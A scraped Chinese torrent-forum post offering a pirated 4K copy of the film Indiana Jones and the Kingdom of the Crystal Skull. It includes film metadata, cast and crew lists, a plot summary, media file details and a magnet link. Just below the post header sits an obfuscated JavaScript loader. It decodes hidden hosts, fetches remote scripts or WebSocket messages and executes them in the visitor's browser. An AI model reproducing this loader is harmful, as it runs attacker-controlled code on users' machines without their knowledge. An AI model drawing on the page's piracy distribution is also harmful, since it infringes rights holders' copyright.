夺宝奇兵4[国英语音轨/中文字幕].Indiana.Jones.and.the.Kingdom.of.the.Crystal.Skull.2008.2160p.4K迅雷下载 19.51GB

版主小s 3月前 231

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 夺宝奇兵4 / 印第安纳琼斯:水晶骷髅王国(台) / 夺宝奇兵之水晶骷髅国 / 印地安纳琼斯和水晶骷髅王国 / 夺宝奇兵4:水晶头骨王国 / 水晶骷髅王国 / 印地安纳琼斯之水晶骷髅王国

◎片 名 Indiana Jones and the Kingdom of the Crystal Skull

◎年 代 2008

◎产 地 美国

◎类 别 动作 / 惊悚 / 冒险

◎语 言 英语 / 德语 / 俄语

◎上映日期 2008-05-22(美国)

◎IMDb链接 https://www.imdb.com/title/tt0367882/

◎豆瓣评分 7.2/10 (50371人评价)

◎豆瓣链接 https://movie.douban.com/subject/1428051/

◎片 长 122分钟

◎导 演 史蒂文·斯皮尔伯格 Steven Spielberg (id:1054440)

◎编 剧 大卫·凯普 David Koepp (id:1019071)

乔治·卢卡斯 George Lucas (id:1054507)

杰夫·内桑森 Jeff Nathanson (id:1292932)

菲利普·考夫曼 Philip Kaufman (id:1027416)

◎演 员 哈里森·福特 Harrison Ford (id:1009238)

希亚·拉博夫 Shia LaBeouf (id:1022000)

凯特·布兰切特 Cate Blanchett (id:1054441)

凯伦·阿兰 Karen Allen (id:1027207)

雷·温斯顿 Ray Winstone (id:1006977)

约翰·赫特 John Hurt (id:1004587)

吉姆·布劳德本特 Jim Broadbent (id:1019049)

Adam Kirley Adam Kirley (id:1305044)

海伦娜·巴雷特 Helena Barrett (id:1419160)

Conor Timmis Conor Timmis (id:1028573)

安德鲁·迪沃夫 Andrew Divoff (id:1010649)

V·J·福斯特 V.J. Foster (id:1330490)

厄尼·雷耶斯 Ernie Reyes Jr. (id:1014014)

约翰托宾 John H. Tobin (id:1054866)

阿兰·戴尔 Alan Dale (id:1067776)

尼托·拉里奥萨 Nito Larioza (id:1209344)

Steven A. Miller Steven A. Miller (id:1251179)

卡洛斯·利纳雷斯 Carlos Linares (id:1211655)

珍妮特·洛佩兹 Janet Lopez (id:1226315)

Andrew Goldfarb Andrew Goldfarb (id:1227856)

Dennis Nusbaum Dennis Nusbaum (id:1228109)

Brian Knutson Brian Knutson (id:1231476)

Sean Marrinan Sean Marrinan (id:1237419)

Gleb Kaminer Gleb Kaminer (id:1209679)

Ilya Jonathan Zaydenberg Ilya Jonathan Zaydenberg (id:1252772)

罗伯特·贝克尔 Robert Baker (id:1192086)

琼·瓦勒拉 Jon Valera (id:1157935)

尼尔·弗林 Neil Flynn (id:1087029)

乔恩·博瑞尔 Jon Braver (id:1279216)

Jonathan Lomma Jonathan Lomma (id:1118182)

帕沙·D.林奇尼科夫 Pasha D. Lychnikoff (id:1123535)

安德雷·阿莱森 Andre Alexsen (id:1269559)

Jerzy Jacyna Jerzy Jacyna (id:1259194)

Sam Rocco Sam Rocco (id:1254317)

萨沙·斯皮尔伯格 Sasha Spielberg (id:1155960)

Paul Thornton Paul Thornton (id:1156514)

切特·汉克斯 Chet Hanks (id:1249843)

凯瑟琳·肯尼迪 Kathleen Kennedy (id:1019168)

福拉维·R·汤贝尼尼 Flávio R. Tambellini (id:1033897)

弗兰克·马歇尔 Frank Marshall (id:1049939)

乔治·卢卡斯 George Lucas (id:1054507)

约翰·威廉姆斯 John Williams (id:1054692)

雅努什·卡明斯基 Janusz Kaminski (id:1009475)

迈克尔·卡恩 Michael Kahn (id:1037019)

黛布拉·赞恩 Debra Zane (id:1301623)

盖·亨德里克斯·戴斯 Guy Hendrix Dyas (id:1023298)

Lawrence A. Hubbs Lawrence A. Hubbs (id:1287063)

Troy Sizemore Troy Sizemore (id:1297724)

卢克·弗里伯恩 Luke Freeborn (id:1276479)

拉里·迪亚斯 Larry Dias (id:1282384)

劳伦·E·波利齐 Lauren E. Polizzi (id:1294667)

玛丽·索弗瑞斯 Mary Zophres (id:1000969)

开尔文·特拉罕 Kelvin R. Trahan (id:1299467)

巴巴拉·洛伦兹 Barbara Lorenz (id:1290317)

里克·斯特拉顿 Rick Stratton (id:1298538)

Carla White Carla White (id:1300794)

Brian Penikas Brian Penikas (id:1294253)

Heather Mages Heather Mages (id:1306035)

迈克·迈克尔斯 Myke Michaels (id:1291984)

乔什·罗森格兰特 John Rosengrant (id:1296098)

Mark Landon Mark Landon (id:1289362)

莫拉格·罗斯 Morag Ross (id:1296145)

Barry R. Koper Barry R. Koper (id:1288888)

Chris Burgoyne Chris Burgoyne (id:1303694)

Jamie Kelman Jamie Kelman (id:1288362)

Carol Schwartz Carol Schwartz (id:1297008)

Debbie Zoller Debbie Zoller (id:1301766)

Ned Neidhardt Ned Neidhardt (id:1303245)

大村浩二 Koji Ohmura (id:1241606)

罗基·福克纳 Rocky Faulkner (id:1203811)

马修·W.蒙格儿 Matthew W. Mungle (id:1131227)

Ken Niederbaumer Ken Niederbaumer (id:1129426)

Karen Asano-Myers Karen Asano-Myers (id:1277472)

詹妮弗·阿斯皮纳尔 Jennifer Aspinall (id:1277513)

杰克·加伯 Jake Garber (id:1098012)

比尔·科尔索 Bill Corso (id:1281317)

肯·迪亚兹 Ken Diaz (id:1282388)

纳塞利·弗蒂 Nathalie Fratti (id:1284115)

托尼·G Toni G (id:1284361)

凯文·黑尼 Kevin Haney (id:1285956)

巴勃罗·赫尔曼 Pablo Helman (id:1011117)

Eric Richard Lasko Eric Richard Lasko (id:1184345)

Lisa C. Satriano Lisa C. Satriano (id:1276451)

Chris Corrado Chris Corrado (id:1072446)

Malu Miranda Malu Miranda (id:1046537)

丹·布莱德利 Dan Bradley (id:1279145)

杰夫·萨尔特茨曼 Jeff Saltzman (id:1296534)

巴里·威廉姆斯 Barry Williams (id:1214148)

Giovanni Nakpil Giovanni Nakpil (id:1216173)

S. Scott Parrish S. Scott Parrish (id:1222546)

布兰科·格鲁契奇 Branko Grujcic (id:1222698)

Kimberly Lashbrook Kimberly Lashbrook (id:1289470)

Kevin Reuter Kevin Reuter (id:1295483)

布雷特·诺特卡特 Brett Northcutt (id:1293296)

Brian Magner Brian Magner (id:1208212)

Rick O'Connor Rick O'Connor (id:1197908)

道格·萨顿 Doug Sutton (id:1298681)

小罗尼·E·威廉姆斯 Ronnie E. Williams Jr. (id:1164066)

Eric Wong Eric Wong (id:1167771)

约翰·西格尔德森 John Sigurdson (id:1169492)

大卫·戈特利布 David Gottlieb (id:1183400)

Mathew Krentz Mathew Krentz (id:1183551)

John Hansen John Hansen (id:1190471)

内尔森·塞普维达 Nelson Sepulveda (id:1297217)

吉姆·苏卡普 Jim Soukup (id:1193247)

Chad Taylor Chad Taylor (id:1298971)

杰克·莫多万 Jack Mongovan (id:1292344)

Yannick 'Botex' Dusseault Yannick 'Botex' Dusseault (id:1282869)

汤姆·菲杰斯 Tom Fejes (id:1283534)

Aaron Ferguson Aaron Ferguson (id:1283576)

戴夫·福格勒 Dave Fogler (id:1283916)

Sherry Hitch Sherry Hitch (id:1286696)

比尔·乔治 Bill George (id:1284713)

布莱恩·格南德 Brian Gernand (id:1284742)

迈克尔·哈尔斯特德 Michael J. Halsted (id:1285887)

克里斯托弗·霍瓦斯 Christopher Horvath (id:1286945)

保罗·哈特森 Paul Huston (id:1287204)

格拉迪·科菲 Grady Cofer (id:1280960)

Stephanie Hornish Stephanie Hornish (id:1286927)

弗朗索瓦·兰伯特 Fran?ois Lambert (id:1289317)

Marshall Richard Krasser Marshall Richard Krasser (id:1288991)

乔恩·亚历山大 Jon Alexander (id:1276987)

Shawn Kelly Shawn Kelly (id:1288355)

Jean Bolte Jean Bolte (id:1278923)

帕特里克·贾尔维斯 Patrick Jarvis (id:1287625)

Geoff Campbell Geoff Campbell (id:1279960)

克雷格·哈迈克 Craig Hammack (id:1285921)

Jung Seung Hong Jung Seung Hong (id:1311909)

米歇尔·莫塔 Michelle Motta (id:1128937)

理查德·布拉夫 Richard Bluff (id:1306174)

Michael Rich Michael Rich (id:1035907)

Scott Younkin Scott Younkin (id:1307271)

Daniel Pearson Daniel Pearson (id:1307511)

马克·西格尔 Mark Siegel (id:1024269)

杰夫·怀特 Jeff White (id:1307659)

史蒂夫·罗林斯 Steve Rawlins (id:1307801)

杰·库珀 Jay Cooper (id:1281222)

凯文·马泰尔 Kevin Martel (id:1307802)

Giles Hancock Giles Hancock (id:1307848)

Michael Gleason Michael Gleason (id:1013136)

巴勃罗·赫尔曼 Pablo Helman (id:1011117)

田师正子 Masahiko Tani (id:1308063)

Matt Brumit Matt Brumit (id:1308885)

Dan Wheaton Dan Wheaton (id:1310282)

Frank Losasso Petterson Frank Losasso Petterson (id:1310487)

C. Michael Easton C. Michael Easton (id:1048745)

Stuart Cripps Stuart Cripps (id:1302245)

Robert Hoffmeister Robert Hoffmeister (id:1099300)

David Weitzberg David Weitzberg (id:1300652)

Paul Churchill Paul Churchill (id:1078031)

约翰·莱文 John M. Levin (id:1118617)

史蒂夫·沃尔顿 Steve Walton (id:1300376)

托德·瓦兹里 Todd Vaziri (id:1299925)

上杉佑子 Yusei Uesugi (id:1299710)

布鲁斯·鲍威尔 Bruce Powell (id:1130151)

帕特里克·克兰斯 Patrick Clancey (id:1071903)

大卫·沙利文 David Sullivan (id:1150862)

◎标 签 冒险 / 美国 / 斯皮尔伯格 / 动作 / 奇幻 / 美国电影 / HarrisonFord / 2008

◎简 介

19年后,印第安纳琼斯博士(HarrisonFord饰)再次启程,旨在将埃克托王国遗失的水晶骷髅头骨归还原地——传说中,归还圣物者将被赐予巨大力量。

在琼斯的老友奥克斯发现水晶头骨前,这一切还只是传说。可奥克斯之后却不知何故丧失了心智,并落入苏联特工队的手中。为首的冷酷女间谍艾瑞娜(CateBlanchett饰)深深着迷于所谓的神秘力量,她胁迫琼斯一行人与其共同前往亚马逊流域,找寻失落的黄金城埃克托王国。

在秘鲁密林,琼斯等人和苏军展开酣畅淋漓的战斗,其间还伴随着沼泽、食人蚁、原始土著攻击等致命威胁,在他们历经千难万险,最终踏入密室的那一刻,世界上最奇异的景象出现了……

◎获奖情况 (共2项)

第29届金酸莓奖 (2009)

最差前传、重拍、恶搞及续集电影

第17届MTV电影奖 (2008)

MTV电影奖 迄今最佳暑期电影(提名)

  1. General

  2. Unique ID : 6979332969762043655920977454281832402 (0x5402BAECA334F1DE8386D478858B7D2)

  3. Complete name : Indiana.Jones.and.the.Kingdom.of.the.Crystal.Skull.2008.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.2Audio.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 19.5 GiB

  7. Duration : 2 h 2 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 22.8 Mb/s

  10. Movie name : Indiana Jones and the Kingdom of the Crystal Skull 2008 2160p HDR UHD BluRay TrueHD 7.1 Atmos 2Audio x265-10bit-HDS

  11. Encoded date : UTC 2021-06-21 01:40:36

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 2 h 2 min

  22. Bit rate : 17.0 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 600 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.116

  32. Stream size : 14.6 GiB (75%)

  33. Title : @HDSky

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  43. Maximum Content Light Level : 739 cd/m2

  44. Maximum Frame-Average Light Level : 331 cd/m2


  45. Audio #1

  46. ID : 2

  47. Format : MLP FBA 16-ch

  48. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  49. Commercial name : Dolby TrueHD with Dolby Atmos

  50. Codec ID : A_TRUEHD

  51. Duration : 2 h 2 min

  52. Bit rate mode : Variable

  53. Bit rate : 4 083 kb/s

  54. Maximum bit rate : 6 465 kb/s

  55. Channel(s) : 8 channels

  56. Channel layout : L R C LFE Ls Rs Lb Rb

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 1 200.000 FPS (40 SPF)

  59. Compression mode : Lossless

  60. Stream size : 3.49 GiB (18%)

  61. Title : English

  62. Language : English

  63. Default : Yes

  64. Forced : No

  65. Number of dynamic objects : 11

  66. Bed channel count : 1 channel

  67. Bed channel configuration : LFE


  68. Audio #2

  69. ID : 3

  70. Format : DTS

  71. Format/Info : Digital Theater Systems

  72. Codec ID : A_DTS

  73. Duration : 2 h 2 min

  74. Bit rate mode : Constant

  75. Bit rate : 1 510 kb/s

  76. Channel(s) : 6 channels

  77. Channel layout : C L R Ls Rs LFE

  78. Sampling rate : 48.0 kHz

  79. Frame rate : 93.750 FPS (512 SPF)

  80. Bit depth : 24 bits

  81. Compression mode : Lossy

  82. Stream size : 1.29 GiB (7%)

  83. Title : Mandarin

  84. Language : Chinese

  85. Default : No

  86. Forced : No


  87. Text #1

  88. ID : 4

  89. Format : PGS

  90. Muxing mode : zlib

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 1 h 54 min

  94. Bit rate : 27.0 kb/s

  95. Count of elements : 2084

  96. Stream size : 22.2 MiB (0%)

  97. Title : ENG

  98. Language : English

  99. Default : Yes

  100. Forced : No


  101. Text #2

  102. ID : 5

  103. Format : PGS

  104. Muxing mode : zlib

  105. Codec ID : S_HDMV/PGS

  106. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  107. Duration : 2 h 1 min

  108. Bit rate : 17.9 kb/s

  109. Count of elements : 2052

  110. Stream size : 15.6 MiB (0%)

  111. Title : CHT

  112. Language : Chinese

  113. Default : No

  114. Forced : No


  115. Text #3

  116. ID : 6

  117. Format : PGS

  118. Muxing mode : zlib

  119. Codec ID : S_HDMV/PGS

  120. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  121. Duration : 2 h 1 min

  122. Bit rate : 17.9 kb/s

  123. Count of elements : 2044

  124. Stream size : 15.6 MiB (0%)

  125. Title : CHT

  126. Language : Chinese

  127. Default : No

  128. Forced : No


  129. Text #4

  130. ID : 7

  131. Format : PGS

  132. Muxing mode : zlib

  133. Codec ID : S_HDMV/PGS

  134. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  135. Duration : 2 h 1 min

  136. Bit rate : 19.3 kb/s

  137. Count of elements : 2034

  138. Stream size : 16.8 MiB (0%)

  139. Title : CHS

  140. Language : Chinese

  141. Default : No

  142. Forced : No


  143. Text #5

  144. ID : 8

  145. Format : PGS

  146. Muxing mode : zlib

  147. Codec ID : S_HDMV/PGS

  148. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  149. Duration : 1 h 55 min

  150. Bit rate : 25.5 kb/s

  151. Count of elements : 1894

  152. Stream size : 21.0 MiB (0%)

  153. Title : CHS

  154. Language : Chinese

  155. Default : No

  156. Forced : No


  157. Text #6

  158. ID : 9

  159. Format : PGS

  160. Muxing mode : zlib

  161. Codec ID : S_HDMV/PGS

  162. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  163. Duration : 1 h 55 min

  164. Bit rate : 26.1 kb/s

  165. Count of elements : 1894

  166. Stream size : 21.4 MiB (0%)

  167. Title : CHT

  168. Language : Chinese

  169. Default : No

  170. Forced : No


  171. Text #7

  172. ID : 10

  173. Format : PGS

  174. Muxing mode : zlib

  175. Codec ID : S_HDMV/PGS

  176. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  177. Duration : 1 h 55 min

  178. Bit rate : 41.5 kb/s

  179. Count of elements : 1894

  180. Stream size : 34.1 MiB (0%)

  181. Title : CHS&ENG

  182. Language : Chinese

  183. Default : No

  184. Forced : No


  185. Text #8

  186. ID : 11

  187. Format : PGS

  188. Muxing mode : zlib

  189. Codec ID : S_HDMV/PGS

  190. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  191. Duration : 1 h 55 min

  192. Bit rate : 42.0 kb/s

  193. Count of elements : 1894

  194. Stream size : 34.5 MiB (0%)

  195. Title : CHT&ENG

  196. Language : Chinese

  197. Default : No

  198. Forced : No


  199. Menu

  200. 00:00:00.000 : en:Chapter 01

  201. 00:07:20.189 : en:Chapter 02

  202. 00:13:10.206 : en:Chapter 03

  203. 00:21:42.634 : en:Chapter 04

  204. 00:27:37.864 : en:Chapter 05

  205. 00:36:57.215 : en:Chapter 06

  206. 00:46:33.623 : en:Chapter 07

  207. 00:55:36.166 : en:Chapter 08

  208. 01:05:45.231 : en:Chapter 09

  209. 01:12:06.779 : en:Chapter 10

  210. 01:21:51.655 : en:Chapter 11

  211. 01:29:11.762 : en:Chapter 12

  212. 01:36:03.006 : en:Chapter 13

  213. 01:44:22.005 : en:Chapter 14

  214. 01:51:07.952 : en:Chapter 15

  215. 01:55:53.738 : en:Chapter 16


TAGS 动作 冒险 惊悚

磁力链:
  • magnet:?xt=urn:btih:4719E959487F852806C40A095FEA7418D63BEC4D
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回